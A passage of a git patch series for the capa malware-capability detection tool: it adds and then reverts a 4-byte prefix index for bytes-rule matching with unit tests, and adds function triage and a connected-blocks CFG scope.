RuleSet._RuleFeatureIndex = self._feature_indexes_by_scopes[scope] - rules: list[Rule] = self.rules_by_scope[scope] # Topologic location of rule given its name. # That is, rules with a lower index should be evaluated first, since their dependencies # will be evaluated later. - rule_index_by_rule_name = {rule.name: i for i, rule in enumerate(rules)} + rule_index_by_rule_name = self._rule_indexes_by_scopes[scope] # This algorithm is optimized to evaluate as few rules as possible, # because the less work we do, the faster capa can run. 
@@ -2003,23 +2030,33 @@ def _match(self, scope: Scope, features: FeatureSet, addr: Address) -> tuple[Fea if wanted_string.evaluate(string_features): candidate_rule_names.add(rule_name) - # Like with String/Regex features above, we have to scan for Bytes to find candidate rules. - # - # We may want to index bytes when they have a common length, like 16 or 32. - # This would help us avoid the scanning here, which would improve performance. - # The strategy is described here: - # https://github.com/mandiant/capa/issues/2128 - if feature_index.bytes_rules: - bytes_features: FeatureSet = {} - for feature, locations in features.items(): + # Like with String/Regex features above, Bytes features cannot be matched via hash lookup. + # To avoid a linear scan of every bytes rule against every extracted bytes feature, + # we bucket rule patterns by their first 4 bytes and only compare patterns whose prefix + # matches the extracted value. Patterns shorter than 4 bytes fall back to a linear scan. + # See: https://github.com/mandiant/capa/issues/2128 + if feature_index.bytes_prefix_rules or feature_index.bytes_short_rules: + bytes_values: list[bytes] = [] + has_short_rules = bool(feature_index.bytes_short_rules) + for feature in features: if isinstance(feature, capa.features.common.Bytes): - bytes_features[feature] = locations - - if bytes_features: - for rule_name, wanted_bytess in feature_index.bytes_rules.items(): - for wanted_bytes in wanted_bytess: - if wanted_bytes.evaluate(bytes_features): + assert isinstance(feature.value, bytes) + value = feature.value + if has_short_rules: + bytes_values.append(value) + if len(value) >= _BYTES_PREFIX_SIZE: + prefix = struct.unpack_from(">I", value)[0] + for rule_name, pattern in feature_index.bytes_prefix_rules.get(prefix, ()): + if value.startswith(pattern): + candidate_rule_names.add(rule_name) + + if has_short_rules and bytes_values: + # Short patterns do not have a fixed-length prefix bucket and require a linear scan. 
+ for rule_name, pattern in feature_index.bytes_short_rules: + for value in bytes_values: + if value.startswith(pattern): candidate_rule_names.add(rule_name) + break # No rules can possibly match, so quickly return. if not candidate_rule_names: diff --git a/capa/rules/cache.py b/capa/rules/cache.py index 1a0d0c0261..621236228c 100644 --- a/capa/rules/cache.py +++ b/capa/rules/cache.py @@ -18,6 +18,7 @@ import pickle import hashlib import logging +import dataclasses from typing import Optional from pathlib import Path from dataclasses import dataclass @@ -164,8 +165,19 @@ def load_cached_ruleset(cache_dir: Path, rule_contents: list[bytes]) -> Optional # delete the cache that seems to be invalid. path.unlink() return None - else: - return cache.ruleset + + # Ensure loaded indexes have all fields declared by current dataclass definitions. + # This catches stale dev caches when _RuleFeatureIndex shape evolves. + try: + for feature_index in cache.ruleset._feature_indexes_by_scopes.values(): + for field in dataclasses.fields(feature_index): + getattr(feature_index, field.name) + except (AttributeError, TypeError): + logger.debug("rule set cache has incompatible structure (stale dev build): %s", path) + path.unlink() + return None + + return cache.ruleset def generate_rule_cache(rules_dir: Path, cache_dir: Path) -> bool: diff --git a/tests/test_match.py b/tests/test_match.py index 9e763bbc82..7ff31465e1 100644 --- a/tests/test_match.py +++ b/tests/test_match.py @@ -887,3 +887,132 @@ def test_index_features_nested_unstable(): assert not index.string_rules assert not index.bytes_rules + + +def test_bytes_prefix_index_correctness_unstable(): + rule_text = textwrap.dedent( + """ + rule: + meta: + name: test bytes prefix index + scopes: + static: function + dynamic: process + features: + - bytes: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 + """ + ) + r = capa.rules.Rule.from_yaml(rule_text) + + # 16 NOP bytes - exact match + _, matches = match([r], 
{capa.features.common.Bytes(b"\x90" * 16): {0x0}}, 0x0) + assert "test bytes prefix index" in matches + + # 32 NOP bytes - startswith match + _, matches = match([r], {capa.features.common.Bytes(b"\x90" * 32): {0x0}}, 0x0) + assert "test bytes prefix index" in matches + + # Different bytes should not match + _, matches = match([r], {capa.features.common.Bytes(b"\x00" * 16): {0x0}}, 0x0) + assert "test bytes prefix index" not in matches + + # Bytes shorter than pattern should not match + _, matches = match([r], {capa.features.common.Bytes(b"\x90" * 8): {0x0}}, 0x0) + assert "test bytes prefix index" not in matches + + +def test_bytes_prefix_index_collision_unstable(): + rule_text = textwrap.dedent( + """ + rule: + meta: + name: test bytes prefix collision + scopes: + static: function + dynamic: process + features: + - bytes: 41 42 43 44 45 46 47 48 + """ + ) + r = capa.rules.Rule.from_yaml(rule_text) + + features = { + capa.features.common.Bytes(b"ABCD1234"): {0x0}, + capa.features.common.Bytes(b"ABCDEFGHzz"): {0x1}, + } + _, matches = match([r], features, 0x0) + assert "test bytes prefix collision" in matches + + +def test_bytes_prefix_index_short_pattern_fallback_unstable(): + rule_text = textwrap.dedent( + """ + rule: + meta: + name: test bytes short prefix fallback + scopes: + static: function + dynamic: process + features: + - bytes: 41 42 43 + """ + ) + r = capa.rules.Rule.from_yaml(rule_text) + + _, matches = match([r], {capa.features.common.Bytes(b"ABCDEF"): {0x0}}, 0x0) + assert "test bytes short prefix fallback" in matches + + _, matches = match([r], {capa.features.common.Bytes(b"XABCDEF"): {0x0}}, 0x0) + assert "test bytes short prefix fallback" not in matches + + +def test_bytes_prefix_index_mixed_short_and_long_patterns_unstable(): + """A rule with both a short (<4B) and a long (>=4B) bytes pattern exercises both code paths.""" + short_rule_text = textwrap.dedent( + """ + rule: + meta: + name: test short pattern rule + scopes: + static: function + 
dynamic: process + features: + - bytes: AA BB + """ + ) + long_rule_text = textwrap.dedent( + """ + rule: + meta: + name: test long pattern rule + scopes: + static: function + dynamic: process + features: + - bytes: CC DD EE FF 11 22 33 44 + """ + ) + short_rule = capa.rules.Rule.from_yaml(short_rule_text) + long_rule = capa.rules.Rule.from_yaml(long_rule_text) + + # Both rules match their respective extracted values. + features = { + capa.features.common.Bytes(b"\xaa\xbb\xcc"): {0x0}, + capa.features.common.Bytes(b"\xcc\xdd\xee\xff\x11\x22\x33\x44\x55"): {0x1}, + } + _, matches = match([short_rule, long_rule], features, 0x0) + assert "test short pattern rule" in matches + assert "test long pattern rule" in matches + + # Only the short rule matches when the long pattern is absent. + _, matches = match([short_rule, long_rule], {capa.features.common.Bytes(b"\xaa\xbb\xcc"): {0x0}}, 0x0) + assert "test short pattern rule" in matches + assert "test long pattern rule" not in matches + + # Only the long rule matches when the short pattern is absent. + features_long_only = { + capa.features.common.Bytes(b"\xcc\xdd\xee\xff\x11\x22\x33\x44"): {0x0}, + } + _, matches = match([short_rule, long_rule], features_long_only, 0x0) + assert "test short pattern rule" not in matches + assert "test long pattern rule" in matches From 553ef552a876a07b8e9f4ca5f149f86950793b52 Mon Sep 17 00:00:00 2001 From: devs6186 Date: Fri, 20 Mar 2026 02:51:43 +0530 Subject: [PATCH 6/7] Revert "rules: add 4-byte prefix index for bytes rule candidate selection" This reverts commit 0b0d1aff08ce7f0e2bfab8fc3d9c5fd7d22de6a3. 
--- CHANGELOG.md | 1 - capa/rules/__init__.py | 75 ++++++------------------ capa/rules/cache.py | 16 +---- tests/test_match.py | 129 ----------------------------------------- 4 files changed, 21 insertions(+), 200 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index d81b20a96c..636f864436 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -52,7 +52,6 @@ - doc: document that default output shows top-level matches only; -v/-vv show nested matches @devs6186 #1410 - doc: fix typo in usage.md, add documentation links to README @devs6186 #2274 -- rules: pre-filter bytes rule candidates by shared 4-byte prefixes to reduce hot-path bytes scanning @devs6186 #2128 - ci: deprecate macos-13 runner and use Python v3.13 for testing @mike-hunhoff #2777 ### Raw diffs diff --git a/capa/rules/__init__.py b/capa/rules/__init__.py index e50235feb6..da0a7d0360 100644 --- a/capa/rules/__init__.py +++ b/capa/rules/__init__.py @@ -18,7 +18,6 @@ import re import copy import uuid -import struct import logging import binascii import collections @@ -57,12 +56,6 @@ logger = logging.getLogger(__name__) -# Fixed prefix size used to pre-filter extracted bytes features. -# This narrows candidate selection from all extracted bytes to those -# sharing a common 4-byte prefix while keeping the implementation simple. -# See: https://github.com/mandiant/capa/issues/2128 -_BYTES_PREFIX_SIZE = 4 - # these are the standard metadata fields, in the preferred order. # when reformatted, any custom keys will come after these. META_KEYS = ( @@ -1447,9 +1440,6 @@ def __init__( self.rules = {rule.name: rule for rule in rules} self.rules_by_namespace = index_rules_by_namespace(rules) self.rules_by_scope = {scope: self._get_rules_for_scope(rules, scope) for scope in scopes} - self._rule_indexes_by_scopes = { - scope: {rule.name: i for i, rule in enumerate(self.rules_by_scope[scope])} for scope in scopes - } # these structures are unstable and may change before the next major release. 
scores_by_rule: dict[str, int] = {} @@ -1649,14 +1639,8 @@ class _RuleFeatureIndex: # All these features will be evaluated whenever a String feature is encountered. string_rules: dict[str, list[Feature]] # Mapping from rule name to list of Bytes features that have to match. - # Retained for logging and existing tests; candidate selection uses the prefix structures below. + # All these features will be evaluated whenever a Bytes feature is encountered. bytes_rules: dict[str, list[Feature]] - # Mapping from 4-byte prefix (as big-endian uint32) to list of (rule_name, pattern) pairs. - # Built once at index time so _match() can bucket-lookup instead of scanning all bytes rules. - bytes_prefix_rules: dict[int, list[tuple[str, bytes]]] - # Rules whose patterns are shorter than _BYTES_PREFIX_SIZE bytes. - # These cannot be bucketed by prefix and require a linear scan fallback. - bytes_short_rules: list[tuple[str, bytes]] # this routine is unstable and may change before the next major release. @staticmethod @@ -1809,8 +1793,6 @@ def and_score_key(item): # Ideally we find a way to get rid of all of these, eventually. 
string_rules: dict[str, list[Feature]] = {} bytes_rules: dict[str, list[Feature]] = {} - bytes_prefix_rules: dict[int, list[tuple[str, bytes]]] = collections.defaultdict(list) - bytes_short_rules: list[tuple[str, bytes]] = [] for rule in rules: rule_name = rule.meta["name"] @@ -1844,14 +1826,6 @@ def and_score_key(item): if bytes_features: bytes_rules[rule_name] = cast(list[Feature], bytes_features) - for bytes_feature in bytes_features: - assert isinstance(bytes_feature.value, bytes) - pattern = bytes_feature.value - if len(pattern) >= _BYTES_PREFIX_SIZE: - prefix = struct.unpack_from(">I", pattern)[0] - bytes_prefix_rules[prefix].append((rule_name, pattern)) - else: - bytes_short_rules.append((rule_name, pattern)) for feature in hashable_features: rules_by_feature[feature].add(rule_name) @@ -1865,9 +1839,7 @@ def and_score_key(item): "indexing: %d scanning string features, %d scanning bytes features", len(string_rules), len(bytes_rules) ) - return RuleSet._RuleFeatureIndex( - rules_by_feature, string_rules, bytes_rules, dict(bytes_prefix_rules), bytes_short_rules - ) + return RuleSet._RuleFeatureIndex(rules_by_feature, string_rules, bytes_rules) @staticmethod def _get_rules_for_scope(rules, scope) -> list[Rule]: @@ -1957,10 +1929,11 @@ def _match(self, scope: Scope, features: FeatureSet, addr: Address) -> tuple[Fea """ feature_index: RuleSet._RuleFeatureIndex = self._feature_indexes_by_scopes[scope] + rules: list[Rule] = self.rules_by_scope[scope] # Topologic location of rule given its name. # That is, rules with a lower index should be evaluated first, since their dependencies # will be evaluated later. - rule_index_by_rule_name = self._rule_indexes_by_scopes[scope] + rule_index_by_rule_name = {rule.name: i for i, rule in enumerate(rules)} # This algorithm is optimized to evaluate as few rules as possible, # because the less work we do, the faster capa can run. 
@@ -2030,33 +2003,23 @@ def _match(self, scope: Scope, features: FeatureSet, addr: Address) -> tuple[Fea if wanted_string.evaluate(string_features): candidate_rule_names.add(rule_name) - # Like with String/Regex features above, Bytes features cannot be matched via hash lookup. - # To avoid a linear scan of every bytes rule against every extracted bytes feature, - # we bucket rule patterns by their first 4 bytes and only compare patterns whose prefix - # matches the extracted value. Patterns shorter than 4 bytes fall back to a linear scan. - # See: https://github.com/mandiant/capa/issues/2128 - if feature_index.bytes_prefix_rules or feature_index.bytes_short_rules: - bytes_values: list[bytes] = [] - has_short_rules = bool(feature_index.bytes_short_rules) - for feature in features: + # Like with String/Regex features above, we have to scan for Bytes to find candidate rules. + # + # We may want to index bytes when they have a common length, like 16 or 32. + # This would help us avoid the scanning here, which would improve performance. + # The strategy is described here: + # https://github.com/mandiant/capa/issues/2128 + if feature_index.bytes_rules: + bytes_features: FeatureSet = {} + for feature, locations in features.items(): if isinstance(feature, capa.features.common.Bytes): - assert isinstance(feature.value, bytes) - value = feature.value - if has_short_rules: - bytes_values.append(value) - if len(value) >= _BYTES_PREFIX_SIZE: - prefix = struct.unpack_from(">I", value)[0] - for rule_name, pattern in feature_index.bytes_prefix_rules.get(prefix, ()): - if value.startswith(pattern): - candidate_rule_names.add(rule_name) - - if has_short_rules and bytes_values: - # Short patterns do not have a fixed-length prefix bucket and require a linear scan. 
- for rule_name, pattern in feature_index.bytes_short_rules: - for value in bytes_values: - if value.startswith(pattern): + bytes_features[feature] = locations + + if bytes_features: + for rule_name, wanted_bytess in feature_index.bytes_rules.items(): + for wanted_bytes in wanted_bytess: + if wanted_bytes.evaluate(bytes_features): candidate_rule_names.add(rule_name) - break # No rules can possibly match, so quickly return. if not candidate_rule_names: diff --git a/capa/rules/cache.py b/capa/rules/cache.py index 621236228c..1a0d0c0261 100644 --- a/capa/rules/cache.py +++ b/capa/rules/cache.py @@ -18,7 +18,6 @@ import pickle import hashlib import logging -import dataclasses from typing import Optional from pathlib import Path from dataclasses import dataclass @@ -165,19 +164,8 @@ def load_cached_ruleset(cache_dir: Path, rule_contents: list[bytes]) -> Optional # delete the cache that seems to be invalid. path.unlink() return None - - # Ensure loaded indexes have all fields declared by current dataclass definitions. - # This catches stale dev caches when _RuleFeatureIndex shape evolves. 
- try: - for feature_index in cache.ruleset._feature_indexes_by_scopes.values(): - for field in dataclasses.fields(feature_index): - getattr(feature_index, field.name) - except (AttributeError, TypeError): - logger.debug("rule set cache has incompatible structure (stale dev build): %s", path) - path.unlink() - return None - - return cache.ruleset + else: + return cache.ruleset def generate_rule_cache(rules_dir: Path, cache_dir: Path) -> bool: diff --git a/tests/test_match.py b/tests/test_match.py index 7ff31465e1..9e763bbc82 100644 --- a/tests/test_match.py +++ b/tests/test_match.py @@ -887,132 +887,3 @@ def test_index_features_nested_unstable(): assert not index.string_rules assert not index.bytes_rules - - -def test_bytes_prefix_index_correctness_unstable(): - rule_text = textwrap.dedent( - """ - rule: - meta: - name: test bytes prefix index - scopes: - static: function - dynamic: process - features: - - bytes: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 - """ - ) - r = capa.rules.Rule.from_yaml(rule_text) - - # 16 NOP bytes - exact match - _, matches = match([r], {capa.features.common.Bytes(b"\x90" * 16): {0x0}}, 0x0) - assert "test bytes prefix index" in matches - - # 32 NOP bytes - startswith match - _, matches = match([r], {capa.features.common.Bytes(b"\x90" * 32): {0x0}}, 0x0) - assert "test bytes prefix index" in matches - - # Different bytes should not match - _, matches = match([r], {capa.features.common.Bytes(b"\x00" * 16): {0x0}}, 0x0) - assert "test bytes prefix index" not in matches - - # Bytes shorter than pattern should not match - _, matches = match([r], {capa.features.common.Bytes(b"\x90" * 8): {0x0}}, 0x0) - assert "test bytes prefix index" not in matches - - -def test_bytes_prefix_index_collision_unstable(): - rule_text = textwrap.dedent( - """ - rule: - meta: - name: test bytes prefix collision - scopes: - static: function - dynamic: process - features: - - bytes: 41 42 43 44 45 46 47 48 - """ - ) - r = capa.rules.Rule.from_yaml(rule_text) 
- - features = { - capa.features.common.Bytes(b"ABCD1234"): {0x0}, - capa.features.common.Bytes(b"ABCDEFGHzz"): {0x1}, - } - _, matches = match([r], features, 0x0) - assert "test bytes prefix collision" in matches - - -def test_bytes_prefix_index_short_pattern_fallback_unstable(): - rule_text = textwrap.dedent( - """ - rule: - meta: - name: test bytes short prefix fallback - scopes: - static: function - dynamic: process - features: - - bytes: 41 42 43 - """ - ) - r = capa.rules.Rule.from_yaml(rule_text) - - _, matches = match([r], {capa.features.common.Bytes(b"ABCDEF"): {0x0}}, 0x0) - assert "test bytes short prefix fallback" in matches - - _, matches = match([r], {capa.features.common.Bytes(b"XABCDEF"): {0x0}}, 0x0) - assert "test bytes short prefix fallback" not in matches - - -def test_bytes_prefix_index_mixed_short_and_long_patterns_unstable(): - """A rule with both a short (<4B) and a long (>=4B) bytes pattern exercises both code paths.""" - short_rule_text = textwrap.dedent( - """ - rule: - meta: - name: test short pattern rule - scopes: - static: function - dynamic: process - features: - - bytes: AA BB - """ - ) - long_rule_text = textwrap.dedent( - """ - rule: - meta: - name: test long pattern rule - scopes: - static: function - dynamic: process - features: - - bytes: CC DD EE FF 11 22 33 44 - """ - ) - short_rule = capa.rules.Rule.from_yaml(short_rule_text) - long_rule = capa.rules.Rule.from_yaml(long_rule_text) - - # Both rules match their respective extracted values. - features = { - capa.features.common.Bytes(b"\xaa\xbb\xcc"): {0x0}, - capa.features.common.Bytes(b"\xcc\xdd\xee\xff\x11\x22\x33\x44\x55"): {0x1}, - } - _, matches = match([short_rule, long_rule], features, 0x0) - assert "test short pattern rule" in matches - assert "test long pattern rule" in matches - - # Only the short rule matches when the long pattern is absent. 
- _, matches = match([short_rule, long_rule], {capa.features.common.Bytes(b"\xaa\xbb\xcc"): {0x0}}, 0x0) - assert "test short pattern rule" in matches - assert "test long pattern rule" not in matches - - # Only the long rule matches when the short pattern is absent. - features_long_only = { - capa.features.common.Bytes(b"\xcc\xdd\xee\xff\x11\x22\x33\x44"): {0x0}, - } - _, matches = match([short_rule, long_rule], features_long_only, 0x0) - assert "test short pattern rule" not in matches - assert "test long pattern rule" in matches From a101073cce6506c387641580bd1134a6c1e114fb Mon Sep 17 00:00:00 2001 From: devs6186 Date: Sat, 21 Mar 2026 22:39:26 +0530 Subject: [PATCH 7/7] static: add function triage and connected-block scope matching --- CHANGELOG.md | 3 + README.md | 16 ++ capa/capabilities/static.py | 138 +++++++++++-- capa/capabilities/triage.py | 202 ++++++++++++++++++++ capa/features/extractors/base_extractor.py | 8 + capa/features/extractors/viv/extractor.py | 22 +++ capa/ida/plugin/cache.py | 59 +++++- capa/ida/plugin/form.py | 11 +- capa/ida/plugin/model.py | 5 +- capa/loader.py | 2 +- capa/render/proto/__init__.py | 4 + capa/rules/__init__.py | 56 +++++- scripts/demo_connected_blocks_and_triage.py | 84 ++++++++ tests/test_capabilities.py | 25 +++ tests/test_connected_blocks.py | 158 +++++++++++++++ tests/test_proto.py | 12 ++ tests/test_rules_insn_scope.py | 36 ++++ tests/test_triage.py | 145 ++++++++++++++ 18 files changed, 963 insertions(+), 23 deletions(-) create mode 100644 capa/capabilities/triage.py create mode 100644 scripts/demo_connected_blocks_and_triage.py create mode 100644 tests/test_connected_blocks.py create mode 100644 tests/test_triage.py diff --git a/CHANGELOG.md b/CHANGELOG.md index 636f864436..2a5da92c2e 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -8,6 +8,9 @@ - vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452 - vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based 
regression tests @devs6186 #2878 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835 +- static: add function triage stage (skip/deprioritize/analyze logging) before function matching; library skip reporting unchanged +- static rules: add `connected blocks` scope/subscope with fixed depth=2 CFG neighborhoods and Vivisect CFG-edge support +- scripts: add `scripts/demo_connected_blocks_and_triage.py` to show triage counts and connected-block rule syntax ### Breaking Changes diff --git a/README.md b/README.md index 8a0fc9e9a3..890e4c6ab5 100644 --- a/README.md +++ b/README.md @@ -89,6 +89,22 @@ To use capa as a library or integrate with another tool, see [doc/installation.m **Documentation:** [Usage and tips](doc/usage.md) · [Installation](doc/installation.md) · [Limitations](doc/limitations.md) · [FAQ](doc/faq.md) +## static pipeline triage and connected blocks + +Recent static pipeline updates add: + +- **function triage** before full function matching: functions may be conservatively marked as skip/deprioritize using lightweight signals (library/flirt state, function size, API presence when available, thunk/runtime naming patterns). +- **connected blocks** static subscope syntax: + +```yaml +- connected blocks: + - and: + - api: kernel32.CreateFileA + - api: kernel32.WriteFile +``` + +Connected-block matching currently uses fixed CFG neighborhood depth `2` and is available when using a backend with CFG edge support (Vivisect). Other static backends return no CFG edges for this scope. + # capa Explorer Web The [capa Explorer Web](https://mandiant.github.io/capa/explorer/) enables you to interactively explore capa results in your web browser. Besides the online version you can download a standalone HTML file for local offline usage. 
diff --git a/capa/capabilities/static.py b/capa/capabilities/static.py index d485aa48c7..d97a7c8270 100644 --- a/capa/capabilities/static.py +++ b/capa/capabilities/static.py @@ -18,14 +18,17 @@ import itertools import collections from dataclasses import dataclass +from collections import deque import capa.perf import capa.helpers +import capa.engine import capa.features.freeze as frz import capa.render.result_document as rdoc from capa.rules import Scope, RuleSet from capa.engine import FeatureSet, MatchResults from capa.capabilities.common import Capabilities, find_file_capabilities +from capa.capabilities.triage import TriageDecision, classify_function, classify_library_function from capa.features.extractors.base_extractor import BBHandle, InsnHandle, FunctionHandle, StaticFeatureExtractor logger = logging.getLogger(__name__) @@ -110,11 +113,47 @@ def find_basic_block_capabilities( @dataclass class CodeCapabilities: function_matches: MatchResults + connected_block_matches: MatchResults basic_block_matches: MatchResults instruction_matches: MatchResults feature_count: int +def _build_connected_block_adjacency( + extractor: StaticFeatureExtractor, fh: FunctionHandle, bbs: tuple[BBHandle, ...] 
+) -> dict: + adjacency = fh.ctx.get("connected_blocks_adjacency") + if adjacency is not None: + return adjacency + + adjacency = collections.defaultdict(set) + bb_by_address = {bb.address: bb for bb in bbs} + for bb in bbs: + adjacency[bb.address] + for succ in extractor.get_cfg_edges(fh, bb): + if succ.address in bb_by_address: + adjacency[bb.address].add(succ.address) + adjacency[succ.address].add(bb.address) + + fh.ctx["connected_blocks_adjacency"] = adjacency + return adjacency + + +def _collect_connected_neighborhood(adjacency: dict, seed, depth: int = 2) -> set: + seen = {seed} + q = deque([(seed, 0)]) + while q: + node, d = q.popleft() + if d >= depth: + continue + for succ in adjacency.get(node, ()): + if succ in seen: + continue + seen.add(succ) + q.append((succ, d + 1)) + return seen + + def find_code_capabilities(ruleset: RuleSet, extractor: StaticFeatureExtractor, fh: FunctionHandle) -> CodeCapabilities: """ find matches for the given rules within the given function. @@ -126,33 +165,66 @@ def find_code_capabilities(ruleset: RuleSet, extractor: StaticFeatureExtractor, # matches found at the basic block scope. # might be found at different basic blocks, that's ok. bb_matches: MatchResults = collections.defaultdict(list) + connected_block_matches: MatchResults = collections.defaultdict(list) # matches found at the instruction scope. # might be found at different instructions, that's ok. 
insn_matches: MatchResults = collections.defaultdict(list) - for bb in extractor.get_basic_blocks(fh): - basic_block_capabilities = find_basic_block_capabilities(ruleset, extractor, fh, bb) - for feature, vas in basic_block_capabilities.features.items(): - function_features[feature].update(vas) - - for rule_name, res in basic_block_capabilities.basic_block_matches.items(): - bb_matches[rule_name].extend(res) - - for rule_name, res in basic_block_capabilities.instruction_matches.items(): - insn_matches[rule_name].extend(res) + has_connected_block_rules = bool(ruleset.connected_block_rules) + if has_connected_block_rules: + bbs = tuple(extractor.get_basic_blocks(fh)) + bb_features_by_address: dict = {} + for bb in bbs: + basic_block_capabilities = find_basic_block_capabilities(ruleset, extractor, fh, bb) + bb_features_by_address[bb.address] = basic_block_capabilities.features + for feature, vas in basic_block_capabilities.features.items(): + function_features[feature].update(vas) + + for rule_name, res in basic_block_capabilities.basic_block_matches.items(): + bb_matches[rule_name].extend(res) + + for rule_name, res in basic_block_capabilities.instruction_matches.items(): + insn_matches[rule_name].extend(res) + + adjacency = _build_connected_block_adjacency(extractor, fh, bbs) + for seed in bbs: + neighborhood = _collect_connected_neighborhood(adjacency, seed.address, depth=2) + neighborhood_features: FeatureSet = collections.defaultdict(set) + for bb_address in neighborhood: + for feature, vas in bb_features_by_address.get(bb_address, {}).items(): + neighborhood_features[feature].update(vas) + + _, matches = ruleset.match(Scope.CONNECTED_BLOCKS, neighborhood_features, seed.address) + for rule_name, res in matches.items(): + connected_block_matches[rule_name].extend(res) + rule = ruleset[rule_name] + for va, _ in res: + capa.engine.index_rule_matches(function_features, rule, [va]) + else: + for bb in extractor.get_basic_blocks(fh): + basic_block_capabilities = 
find_basic_block_capabilities(ruleset, extractor, fh, bb) + for feature, vas in basic_block_capabilities.features.items(): + function_features[feature].update(vas) + + for rule_name, res in basic_block_capabilities.basic_block_matches.items(): + bb_matches[rule_name].extend(res) + + for rule_name, res in basic_block_capabilities.instruction_matches.items(): + insn_matches[rule_name].extend(res) for feature, va in itertools.chain(extractor.extract_function_features(fh), extractor.extract_global_features()): function_features[feature].add(va) _, function_matches = ruleset.match(Scope.FUNCTION, function_features, fh.address) - return CodeCapabilities(function_matches, bb_matches, insn_matches, len(function_features)) + return CodeCapabilities(function_matches, connected_block_matches, bb_matches, insn_matches, len(function_features)) def find_static_capabilities( ruleset: RuleSet, extractor: StaticFeatureExtractor, disable_progress=None ) -> Capabilities: all_function_matches: MatchResults = collections.defaultdict(list) + all_connected_block_matches: MatchResults = collections.defaultdict(list) all_bb_matches: MatchResults = collections.defaultdict(list) all_insn_matches: MatchResults = collections.defaultdict(list) @@ -163,6 +235,7 @@ def find_static_capabilities( functions: list[FunctionHandle] = list(extractor.get_functions()) n_funcs: int = len(functions) n_libs: int = 0 + triage_counts: collections.Counter = collections.Counter() percentage: float = 0 with capa.helpers.CapaProgressBar( @@ -171,7 +244,27 @@ def find_static_capabilities( task = pbar.add_task( "matching", total=n_funcs, unit="functions", postfix=f"skipped {n_libs} library functions, {percentage}%" ) + triage_results: dict = {} + prioritized_functions: list[FunctionHandle] = [] + deprioritized_functions: list[FunctionHandle] = [] + skipped_functions: list[FunctionHandle] = [] for f in functions: + if extractor.is_library_function(f.address): + triage_counts[TriageDecision.SKIP.value] += 1 + 
classify_library_function(f) + prioritized_functions.append(f) + continue + triage = classify_function(extractor, f) + triage_results[f.address] = triage + triage_counts[triage.decision.value] += 1 + if triage.decision == TriageDecision.SKIP: + skipped_functions.append(f) + elif triage.decision == TriageDecision.DEPRIORITIZE: + deprioritized_functions.append(f) + else: + prioritized_functions.append(f) + + for f in itertools.chain(prioritized_functions, deprioritized_functions, skipped_functions): t0 = time.time() if extractor.is_library_function(f.address): function_name = extractor.get_function_name(f.address) @@ -185,6 +278,12 @@ def find_static_capabilities( pbar.advance(task) continue + triage = triage_results[f.address] + if triage.decision == TriageDecision.SKIP: + logger.debug("skipping triaged function %s (%s)", f.address, triage.reason) + pbar.advance(task) + continue + code_capabilities = find_code_capabilities(ruleset, extractor, f) feature_counts.functions += ( rdoc.FunctionFeatureCount( @@ -196,6 +295,7 @@ def find_static_capabilities( match_count = 0 for name, matches_ in itertools.chain( code_capabilities.function_matches.items(), + code_capabilities.connected_block_matches.items(), code_capabilities.basic_block_matches.items(), code_capabilities.instruction_matches.items(), ): @@ -212,6 +312,8 @@ def find_static_capabilities( for rule_name, res in code_capabilities.function_matches.items(): all_function_matches[rule_name].extend(res) + for rule_name, res in code_capabilities.connected_block_matches.items(): + all_connected_block_matches[rule_name].extend(res) for rule_name, res in code_capabilities.basic_block_matches.items(): all_bb_matches[rule_name].extend(res) for rule_name, res in code_capabilities.instruction_matches.items(): @@ -219,11 +321,22 @@ def find_static_capabilities( pbar.advance(task) + logger.debug( + "function triage summary: analyze=%d deprioritize=%d skip=%d (library=%d)", + triage_counts[TriageDecision.ANALYZE.value], + 
triage_counts[TriageDecision.DEPRIORITIZE.value], + triage_counts[TriageDecision.SKIP.value] - n_libs, + n_libs, + ) + # collection of features that captures the rule matches within function, BB, and instruction scopes. # mapping from feature (matched rule) to set of addresses at which it matched. function_and_lower_features: FeatureSet = collections.defaultdict(set) for rule_name, results in itertools.chain( - all_function_matches.items(), all_bb_matches.items(), all_insn_matches.items() + all_function_matches.items(), + all_connected_block_matches.items(), + all_bb_matches.items(), + all_insn_matches.items(), ): locations = {p[0] for p in results} rule = ruleset[rule_name] @@ -239,6 +352,7 @@ def find_static_capabilities( # and we can merge the dictionaries naively. all_insn_matches.items(), all_bb_matches.items(), + all_connected_block_matches.items(), all_function_matches.items(), all_file_capabilities.matches.items(), ) diff --git a/capa/capabilities/triage.py b/capa/capabilities/triage.py new file mode 100644 index 0000000000..b016b2d894 --- /dev/null +++ b/capa/capabilities/triage.py @@ -0,0 +1,202 @@ +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import logging +from enum import Enum +from dataclasses import dataclass + +import capa.features.insn +from capa.features.extractors.base_extractor import FunctionHandle, StaticFeatureExtractor + +logger = logging.getLogger(__name__) + + +REASON_DEFAULT = "analyze" +REASON_LIBRARY = "library/flirt function" +REASON_CRT_NAME = "crt/runtime function name pattern" +REASON_TINY_NO_API = "tiny function without API evidence" +REASON_THUNK = "thunk-like function" +REASON_RUNTIME_SECTION = "runtime section pattern" +REASON_LARGE_COMPLEXITY = "large function complexity" + +CRT_NAME_PREFIXES = ( + "__security_", + "__scrt_", + "__acrt_", + "__vcrt_", + "__chkstk", + "_chkstk", + "__gshandler", + "__cxx", + "_cxx", + "__initterm", + "_initterm", + "__crt", + "__imp_", + "_imp__", +) + +RUNTIME_SECTION_NAMES = { + ".init", + ".fini", + ".init_array", + ".fini_array", + ".ctors", + ".dtors", + ".plt", + ".plt.got", + ".plt.sec", +} + + +class TriageDecision(str, Enum): + ANALYZE = "analyze" + SKIP = "skip" + DEPRIORITIZE = "deprioritize" + + +@dataclass(frozen=True) +class TriageResult: + decision: TriageDecision + reason: str = REASON_DEFAULT + + +def 